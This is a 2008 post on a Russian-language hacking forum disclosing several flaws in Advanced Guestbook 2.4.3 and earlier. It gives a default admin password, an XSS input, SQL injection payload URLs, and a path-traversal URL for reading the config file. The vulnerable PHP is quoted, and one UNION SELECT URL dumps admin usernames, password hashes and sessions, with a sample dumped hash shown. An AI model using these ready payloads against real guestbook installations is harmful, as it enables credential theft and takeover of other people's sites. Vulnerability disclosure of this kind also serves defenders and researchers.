ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Advanced Guestbook <=2.4.3 уязвимости (малозначимые)
  #1  
Старый 25.01.2008, 05:01
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Advanced Guestbook <=2.4.3 уязвимости (малозначимые)

1) Дефолтный аккаунт администратора:
Цитата:
admin : pass
2) Раскрытие пути в install.php (при нажатии на кнопку) (error_reporting=On)
Warning: mysql_connect(): Access denied for user 'ODBC'@'localhost' (using password: NO)
in Q:\home\localhost\www\agb\install.php on line 258
Cannot connect to database

Также в скрипте misc/forget_pass.php.

3) XSS в скрипте install.php:
POST:
...&host=localhost"><h1>Here_I_am....

4) SQL инъекция в скрипте admin.php (magic_quotes=Off):
admin.php?action=smilies&session=ef7658b27e55dc226 4d2ee175a546f5c&uid=1&del_smilie=1'

Уязвимый код:
PHP код:
 if (isset($del_smilie)) {
                
$gb_auth->query("DELETE FROM ".$GB_TBL['smile']." WHERE id='$del_smilie'"); 
admin.php?action=smilies&session=ef7658b27e55dc226 4d2ee175a546f5c&uid=1&edit_smilie=1'

Уязвимый код:
PHP код:
if (isset($edit_smilie)) {
                if (isset(
$s_code) && isset($s_emotion)) {
                    if (!
get_magic_quotes_gpc()) {
                        
$s_code addslashes($s_code);
                        
$s_emotion addslashes($s_emotion);
                    }
                    
$gb_auth->query("UPDATE ".$GB_TBL['smile']." SET s_code='$s_code', s_emotion='$s_emotion' WHERE id='$edit_smilie'"); 
Пример использования:
admin.php?action=smilies&session=ef7658b27e55dc226 4d2ee175a546f5c&uid=1&edit_smilie=1'+and+(1=0)
+union+select+1,2,concat(username,':',password,':' ,session),4,5,6+from+book_auth/
*

admin:29bad1457ee5e49e:ea3d671d4778a037b0fb42ef738 fc521

Уязвимый код:
PHP код:
$gb_auth->query("SELECT * FROM ".$GB_TBL['smile']." WHERE id='$edit_smilie'"); 

5) Чтение произвольных (практически ;-)) файлов (бага старая, перекочевала из предыдущих версий):

Пример использования:
admin.php?action=template&tpl_name=../admin/config.inc.php&session=e17acac372b1cd1c197b838f234 6d6c0&uid=1
P. S. сессии администратора существуют в течение получаса.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось 1ten0.0net1; 25.01.2008 в 05:12..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06
Какие уязвимости присутствуют в Achims Guestbook Diablo Форумы 6 29.01.2006 22:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ